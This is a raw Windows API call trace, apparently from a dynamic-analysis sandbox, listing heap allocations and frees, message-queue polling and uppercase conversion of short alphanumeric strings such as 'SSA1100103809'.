RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0203.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0203.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0203.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0203.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0203.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0203.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0203.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0203.243] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0203.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0203.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8d0 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0203.243] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0203.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0203.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0203.244] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0203.244] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0203.245] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0203.245] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74508 [0203.245] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0203.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0203.245] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0203.246] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0203.246] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74508 | out: hHeap=0x2af0000) returned 1 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0203.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0203.247] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0203.247] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0203.247] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0203.247] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0203.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0203.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0203.247] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0203.248] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0203.248] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0203.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.249] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.249] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0203.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0203.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0203.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0203.249] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0203.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0203.250] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8d0 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0203.250] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0203.250] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.251] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0203.251] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0203.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0203.251] 